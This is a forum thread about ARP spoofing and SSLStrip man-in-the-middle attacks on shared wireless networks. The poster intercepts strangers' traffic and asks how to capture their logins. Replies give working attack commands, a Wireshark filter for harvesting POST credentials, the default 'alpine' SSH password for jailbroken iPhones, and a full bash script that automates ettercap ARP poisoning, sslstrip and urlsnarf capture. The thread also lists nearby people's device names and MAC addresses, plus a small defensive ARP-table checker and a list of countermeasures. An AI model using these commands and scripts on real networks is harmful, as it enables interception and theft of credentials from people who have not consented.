
What On Earth Is Going On With This ARP Spoofing / SSL Strip Situation?



Posted

I am having some interesting experiences while ARP spoofing and using SSLStrip. There are a couple of things I just cannot make sense of. I have watched the Hak5 videos about this topic, which is why I hope that this forum is an appropriate place to post. I'm not doing this for malicious purposes - I'm just curious, that's all, and have spent many hours trying to figure out my problem with zero success.

Here's what I do.

Connect to the network.

su root

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan0 192.168.x.x [based on route -n]

sslstrip -a -l 10000 [the -a options logs all traffic not just POST requests]

This often works fine but sometimes there are problems.

There are two issues (which may or may not be interconnected).

First:

I ARPspoof the network as described above. However, my Wireshark logs do not reveal that any HTTP, TCP, or TLS traffic is going through me. I obviously should be the MITM. I can see that I am telling everyone that I am the router with my ARP commands. But no content is going through me. I can observe lots of people nearby in the room doing various things that would generate traffic. And I am using the -a option so everything should be logged. But the log file stays at 0 bytes.

Why is nothing going through me? I could understand if the network was empty, but it isn't, as within a few minutes the Wireshark file has tens of thousands of entries.

Second:

This is more common than the above. The Wireshark logs do show DNS, HTTP, TCP, and TLS traffic but, once again, the log file stays at 0 bytes. I can see that, this time, traffic is flowing through me and I really do appear to be a MITM. But, in reality, no traffic is ever being recorded.

The point is that I am forcing traffic through me so the ARP commands are effective. But nothing is saved.

I have the Wireshark logs so if anyone has a specific question I can certainly refer to them.

Many thanks - I am so confused about this and would really like to learn.

Posted

What's the site you are trying to SSL strip? Some sites force SSL only; even when trying to run SSL strip, they will reject HTTP traffic. Also, make sure you start Wireshark with sudo (I see you su root above, but if that's only for the arpspoof terminal, your second terminal needs to su root or sudo wireshark too, I believe).

Can you screen cap everything you are doing? Maybe someone watching can spot where it's going wrong or a step missed.

Posted

What wireless adapter are you using? Also, are you using VM or just a physical machine?

Posted

I am trying to log all traffic, not a specific site.

With arpspoof -i wlan0 [IP address of router] I should be the MITM for all traffic on the network which uses that router.

I always use sudo wireshark but all traffic is saved with sslstrip and the -a option.

I am using a physical machine.

The wireless adapter (wlan0) is Atheros Communications Inc. AR928X Wireless Network Adapter (PCI-Express) (rev 01).

I have been successful on many occasions so I do not see how the issue is at my end.

Thanks again!

Posted

Are you saving Wireshark to disk on the fly and buffering logs, or just running in real time? You need to cancel the logging and then save the pcap, or change the logging in Wireshark to buffer to files every so many megabytes and it will generate pcaps on the go.

Posted

I do not think I have explained myself well.

The issue is nothing to do with Wireshark. I am only using Wireshark to see what traffic is going through me when I am MITM.

sslstrip (http://www.thoughtcrime.org/software/sslstrip/) should log everything when I use its -a option.

Often it works but - in the two experiences I provided in the original post - it will not log anything even though I am MITM.

Posted

Double check all the files and steps; make sure the port forward file doesn't contain 11 or 111, for example ;)

Posted

This is just a suggestion, it may or may not work, but have you tried putting your wireless card into monitor mode instead of managed?

if you type iwconfig at the terminal, it should say if the card is in managed or monitor mode.

Typing this command at the terminal will temporarily change your card's current mode into the chosen one.


iwconfig wlan0 mode monitor

Posted

Some updates - and thanks for all the advice:

I tried again on a network where it looks as if traffic (HTTP, SSL, etc) is flowing through me but nothing gets saved by SSL Strip. According to this article (http://torpedo48.it/hacking-tutorials/man-in-the-middle-attacks-mitm/how-to-sniff-all-network-traffic-using-https-stripping) you can view POST data (secure and not secure) in Wireshark.

It says: "Login forms usually use the POST request method to send credentials to servers; using this filter you'll be able to find out all the credentials your victims inserted in the sites they visited (even the secured ones, thanks to Sslstrip!): "http.request.method == "POST""."

The idea is, as I understand it, that SSL Strip will work on the MITM computer before the packets are saved by Wireshark.

I tried the http.request.method == "POST" filter on a Wireshark file with 40,000 entries but found nothing.

Interestingly, the sslstrip.log file did contain entries like this:

2012-10-02 14:22:55,593 Host resolution error: [Failure instance: Traceback (failure with no frames): <class 'twisted.internet.error.DNSLookupError'>: DNS lookup failed: address 'loginsvc.world.com' not found: [Errno -5] No address associated with hostname.

And:

012-10-02 14:22:28,068 Resolving host: www.whatever.org.uk

2012-10-02 14:22:28,069 Host not cached.

This is all the log showed with the -a (all) option which normally would record a wide range of HTTP traffic. Perhaps these errors reveal something?

Monitor mode:

I used: sudo iwconfig wlan0 mode monitor

However, I always got:

Error for wireless request "Set Mode" (8B06) :

SET failed on device wlan0 ; Device or resource busy.

I'll try it next time with airmon-ng.

I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.

Posted (edited)

It's possible some sites are defined to not run on HTTP, and as such only pass data if HTTPS is working, so you might not see anything, but try testing with multiple different SSL sites. Also, maybe post all commands from start to finish; possibly something is mis-configured, or just broken. As for monitor mode, MITM works in Windows without it, so I don't think that will have anything to do with it. If anything you want it in managed mode and promisc off.

Edited by digip
Posted

I still do not understand why Wireshark shows that I am the MITM but SSLStrip will not log anything.

Digip has a point: you have to make sure the website in question is not enforcing the use of HTTPS, because if it is, SSLstrip won't help much. I would advise running SSLstrip against some websites that use HTTPS to see what kind of results you get.

Posted

I don't understand the last two comments.

The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim).

The sslstrip.log file normally shows POST and SECURE POST logins and passwords.

I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark.

Or did I misunderstand what the last two posters were saying?

Posted (edited)

I don't understand the last two comments.

The whole point of SSL Strip is that it converts HTTPS sessions to HTTP sessions (at least between the MITM and the victim).

The sslstrip.log file normally shows POST and SECURE POST logins and passwords.

I thought that even if SSL Strip was not - for some reason - logging then the plaintext logins and passwords would show in Wireshark.

Or did I misunderstand what the last two posters were saying?

There are certain websites that are programmed to explicitly use HTTPS only. If the connection is somehow reverted to HTTP, the server will either terminate the connection or refuse to work on HTTP.

This could explain why SSLstrip, in your case, is failing to log any logins and passwords.

On the other hand, there are websites that, even though they use HTTPS, could still work over HTTP, and that's where, in certain situations, SSLstrip is able to log the logins and passwords for you.

Edited by Infiltrator
Posted

On a related topic.

What is the difference between 192.168.1.1 (which is the router address) and 192.168.1.255 (which is the broadcast address)?

For example, I have always used:

arpspoof -i wlan0 192.168.1.1

However, at least one commentator on the Backtrack forum suggests that, to spoof the entire network, one should use the broadcast address.

What would be the difference between arpspoofing these two IPs?

Thanks.

Posted

I don't know that you can use the broadcast address, but that address also changes depending on the actual subnet mask in use, so if your subnet mask is 255.255.255.0 then yes, 192.168.1.255 is the broadcast address. But typically you poison the router and the target machine, not the broadcast address, and I'm not sure tools even let you use the broadcast. I know Cain only lets you do the router and the nodes on the system, and not the broadcast address. Reason being, Cain does ARP cache poisoning, which is essentially what most ARP attacks are doing anyway. You want to tell the router you are the target and then tell the target you are the router, so traffic for the two flows through you and you can then sniff that traffic. SSL strip introduces the ability to force it to HTTP vs HTTPS, but some sites, again, force SSL.

Switches make this harder, whereas wireless tends to make it much easier to poison. Distance plays a role in a successful MITM over wireless too, as well as speed, but with wired, at some point the devices tend to learn each other again if the program doing the poisoning isn't resending spoofed MAC address data to the two nodes you're trying to sit between, and that can foul up ARP tables and cause the router to stop responding to both of you, especially on fast wired equipment. Also, trying to take over and spoof every connection on a network, depending on the size, wouldn't be wise. If on a corporate network and, say, a class A subnet, you would be the main bottleneck and bring things down in a jiffy if a few thousand nodes tried flowing through your one NIC.

As for why the SSL strip part isn't working, I can't specifically say, other than my guess is the site you are hitting forces HTTPS or has a cookie setting the user set under their profile, like say Twitter, to only allow that user to use SSL, which will keep redirecting them back to HTTPS once they are logged in. Getting their cookies through sidejacking might be possible if you can force them to log out and have to re-authenticate, but you'd have to introduce a logout link and make them somehow click it, forcing them to have to sign back in, and usually they log in over HTTP, and once signed in it checks if they wanted to always be on HTTPS and then redirects them. Hotmail (or Outlook now) and I think even Facebook now force SSL across their sites, and even Gmail I think does too now, so you just have to try some other sites and see what happens. If you can do it on one site but not another, it's probably because of the site forcing SSL and ignoring HTTP traffic, but if it works nowhere at all, then that's another story.

There is also a tool, I forget the name of it, might even be part of SSL strip, that allows you to spoof certificates too, so you can snoop SSL traffic, but that requires the end user to accept the certificate (most modern browsers should prompt them that something is wrong, or even block access if the certs don't match) or the browser would have to be set up to ignore certificate errors, which most of the time requires users to disable that check, and isn't something on by default.

Posted

Thanks so much!

New question:

If I am the MITM and run arp -a in Ubuntu which reveals the results below then I think this signifies that all these participants are going through me. Correct?

iPad-von-Resi.local (10.129.50.103) at b8:ff:61:0c:f1:29 [ether] on wlan0

Leonids-iPod.local (10.129.50.105) at <incomplete> on wlan0

? (10.129.50.112) at <incomplete> on wlan0

Sams-iPad-2.local (10.129.50.121) at 34:51:c9:c0:b2:3b [ether] on wlan0

Becky-Turners-iPhone.local (10.129.50.100) at 5c:95:ae:6a:aa:d5 [ether] on wlan0

? (10.129.50.97) at 44:d3:ca:91:2a:48 [ether] on wlan0

? (10.129.50.106) at <incomplete> on wlan0

? (10.129.50.102) at 8c:fa:ba:95:ba:ef [ether] on wlan0

? (10.129.50.110) at c0:9f:42:79:7b:a3 [ether] on wlan0

? (10.129.50.111) at 68:a3:c4:6a:f3:26 [ether] on wlan0

Two points:

Why are some incomplete?

I also suspect that iPads and iPhones act abnormally and - assuming their owners use 3G rather than wireless - this means that they are not really going through me. Does this sound OK?

Thanks again!

Posted (edited)

I actually tried arpspoofing an iPhone once and I think it failed over to the carrier when I tried it, so there might be something built into Apple devices smart enough to know when a gateway changes IP and MAC for the same IP, and it blocks it. No clue on the "incomplete", but maybe read the documentation on the tool; it might have an answer for that. On a side note, all iPhones and iPads have the same shell password of "alpine". If any of those devices were jailbroken, and they never bothered to run passwd afterwards, they are fucked. Wouldn't suggest SSH'ing into devices you don't own either, but if you're already arpspoofing someone's network, I gather that doesn't mean a whole lot..lol

Edited by digip
  • 3 weeks later...
Posted

I think I may be able to explain the 'what' of the situation, if not the 'why'.

It is based on the 'arp -a' command.

I ARPspoof as follows:

echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

arpspoof -i wlan0 [IP address of router]

sslstrip -l 10000 [to log POST requests]

If I issue 'arp -a' and get something like this...

? (10.108.0.6) at 00:50:50:d7:60:24 [ether] on wlan0

...then I know that no traffic is routed through me since the answer shows my connection to the router.

However, if 'arp -a' provides something like this...

? (192.168.4.18) at 00:12:0b:32:1a:04 [ether] on wlan0

? (192.168.4.32) at 00:12:0d:30:18:e4 [ether] on wlan0

? (192.168.1.62) at 71:56:82:88:e8:f2 [ether] on wlan0

? (192.168.4.11) at 00:12:0a:30:20:d1 [ether] on wlan0

...then I know that ARPspoofing has been successful and I am the MITM.

So, my question is: how do the owners of some networks prevent ARPspoofing commands from working?

All of the networks where I failed to ARPspoof were 10.xxx.xxx.xxx networks. Yet I have been successful now and again on 10.xxx.xxx.xxx networks. All failures are 10.xxx.xxx.xxx networks but not all 10.xxx.xxx.xxx networks are failures.

Any ideas how network owners can prevent ARP spoofing? Thanks!

Posted

Any ideas how network owners can prevent ARP spoofing? Thanks!

- AP isolation at the router.

- A local/network script or antivirus to monitor arp-tables running on your os

- Browsers can check for SSL

- IPS could have various LAN defences, making sure 192.168.1.1 is indeed itself, etc etc
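A defender-side version of the points raised in this thread (the `arp -a` listings, the `<incomplete>` entries, and the "make sure 192.168.1.1 is indeed itself" advice), as an added example that is not part of the original thread. The two snapshots are constructed with made-up addresses, and the regex assumes the net-tools `arp -a` line format quoted above.

```python
import re
from collections import defaultdict

# Matches the net-tools `arp -a` line format quoted in the thread, e.g.
#   ? (10.129.50.97) at 44:d3:ca:91:2a:48 [ether] on wlan0   or   ... at <incomplete> on wlan0
ARP_LINE = re.compile(
    r"^(?P<host>\S+) \((?P<ip>\d+(?:\.\d+){3})\) at "
    r"(?P<mac><incomplete>|(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
    r"(?: \[ether\])? on (?P<iface>\S+)$")

def parse_arp(text):
    """Return (ip, mac) pairs; mac is None for <incomplete> entries."""
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line.strip())
        if m:
            mac = m.group("mac").lower()
            entries.append((m.group("ip"), None if mac == "<incomplete>" else mac))
    return entries

def incomplete_ips(entries):
    """<incomplete> means the kernel asked for that IP's MAC and got no reply
    (host asleep, gone, or ignoring us); it says nothing about traffic flow."""
    return sorted(ip for ip, mac in entries if mac is None)

def shared_macs(entries):
    """One MAC answering for several IPs is the poisoning signature (the spoofer
    claims the gateway and the hosts). Proxy ARP/VRRP can look alike, so verify."""
    by_mac = defaultdict(set)
    for ip, mac in entries:
        if mac:
            by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_mac_change(before, after, gateway_ip):
    """(old_mac, new_mac) if the gateway's MAC differs between two snapshots."""
    old, new = dict(before).get(gateway_ip), dict(after).get(gateway_ip)
    return (old, new) if old and new and old != new else None

# Constructed snapshots (made-up, locally administered MACs) before/after a poisoning event.
SNAPSHOT_BEFORE = """\
_gateway (192.168.1.1) at 02:00:00:aa:bb:01 [ether] on wlan0
? (192.168.1.20) at 02:00:00:aa:bb:20 [ether] on wlan0
"""
SNAPSHOT_AFTER = """\
_gateway (192.168.1.1) at 02:00:00:aa:bb:99 [ether] on wlan0
? (192.168.1.20) at 02:00:00:aa:bb:20 [ether] on wlan0
? (192.168.1.21) at 02:00:00:aa:bb:99 [ether] on wlan0
some-ipad.local (192.168.1.22) at <incomplete> on wlan0
"""

def analyze(before_text, after_text, gateway_ip="192.168.1.1"):
    before, after = parse_arp(before_text), parse_arp(after_text)
    return {"gateway_mac_change": gateway_mac_change(before, after, gateway_ip),
            "shared_macs": shared_macs(after), "incomplete": incomplete_ips(after)}
```

Call `analyze(SNAPSHOT_BEFORE, SNAPSHOT_AFTER)` to see all three findings; on a live host, feed it the output of two `arp -a` runs taken a few seconds apart.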

Posted

OK, if you want this to be really easy, make sure you have ettercap (not ettercap-gtk, just the text-only version), urlsnarf, and tcpxtract installed.

Here's a handy little script that you can just run as root that will set up everything for you. Of course you will have to fill in a few blanks that it will ask for, such as gateway/target IP address, and whether you want to run Wireshark and/or extract images when your session is done.


#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of \"Session\"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
